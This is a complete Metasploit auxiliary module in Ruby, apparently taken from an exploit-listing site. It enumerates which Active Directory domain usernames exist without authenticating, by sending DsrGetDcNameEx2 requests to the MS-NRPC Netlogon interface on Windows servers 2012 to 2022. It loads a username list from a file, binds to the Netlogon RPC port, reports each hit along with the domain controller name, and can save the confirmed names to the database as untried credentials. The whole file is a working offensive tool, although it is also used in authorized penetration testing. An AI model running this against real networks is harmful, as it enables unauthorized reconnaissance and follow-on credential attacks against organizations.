## https://sploitus.com/exploit?id=MSF:AUXILIARY-SCANNER-DCERPC-NRPC_ENUMUSERS-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::DCERPC
Netlogon = RubySMB::Dcerpc::Netlogon
@dport = nil
def initialize(info = {})
super(
update_info(
info,
'Name' => 'MS-NRPC Domain Users Enumeration',
'Description' => %q{
This module will enumerate valid Domain Users via no authentication against MS-NRPC interface.
It calls DsrGetDcNameEx2 to check if the domain user account exists or not. It has been tested with
Windows servers 2012, 2016, 2019 and 2022.
},
'Author' => [
'Haidar Kabibo <https://x.com/haider_kabibo>'
],
'References' => [
['URL', 'https://github.com/klsecservices/Publications/blob/master/A_journey_into_forgotten_Null_Session_and_MS-RPC_interfaces.pdf']
],
'License' => MSF_LICENSE,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [],
'SideEffects' => []
}
)
)
register_options(
[
OptPort.new('RPORT', [false, 'The netlogon RPC port']),
OptPath.new('USER_FILE', [true, 'Path to the file containing the list of usernames to enumerate']),
OptBool.new('DB_ALL_USERS', [ false, 'Add all enumerated usernames to the database', false ])
]
)
end
def bind_to_netlogon_service
@dport = datastore['RPORT']
if @dport.nil? || @dport == 0
@dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], Netlogon::UUID, '1.0', 'ncacn_ip_tcp')
fail_with(Failure::NotFound, 'Could not determine the RPC port used by the Microsoft Netlogon Server') unless @dport
end
handle = dcerpc_handle(Netlogon::UUID, '1.0', 'ncacn_ip_tcp', [@dport])
print_status("Binding to #{handle}...")
dcerpc_bind(handle)
end
def dsr_get_dc_name_ex2(username)
request = Netlogon.const_get('DsrGetDcNameEx2Request').new(
computer_name: nil,
account_name: username,
allowable_account_control_bits: 0x200,
domain_name: nil,
domain_guid: nil,
site_name: nil,
flags: 0x00000000
)
begin
raw_response = dcerpc.call(request.opnum, request.to_binary_s)
rescue Rex::Proto::DCERPC::Exceptions::Fault
fail_with(Failure::UnexpectedReply, "The Netlogon RPC request failed for username: #{username}")
end
Netlogon.const_get('DsrGetDcNameEx2Response').read(raw_response)
end
def report_username(domain, username)
service_data = {
address: datastore['RHOST'],
port: @dport,
service_name: 'netlogon',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: username,
realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
realm_value: domain
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED
}.merge(service_data)
create_credential_login(login_data)
end
def run_host(_ip)
usernames = load_usernames(datastore['USER_FILE'])
bind_to_netlogon_service
usernames.each do |username|
enumerate_user(username)
end
end
private
def load_usernames(file_path)
unless ::File.exist?(file_path)
fail_with(Failure::BadConfig, 'The specified USER_FILE does not exist')
end
usernames = []
::File.foreach(file_path) do |line|
usernames << line.strip
end
usernames
end
def enumerate_user(username)
response = dsr_get_dc_name_ex2(username)
if response.error_status == 0
print_good("#{username} exists -> DC: #{response.domain_controller_info.domain_controller_name.encode('UTF-8')}")
if datastore['DB_ALL_USERS']
report_username(response.domain_controller_info.domain_name.encode('UTF-8'), username)
end
else
print_error("#{username} does not exist")
end
end
end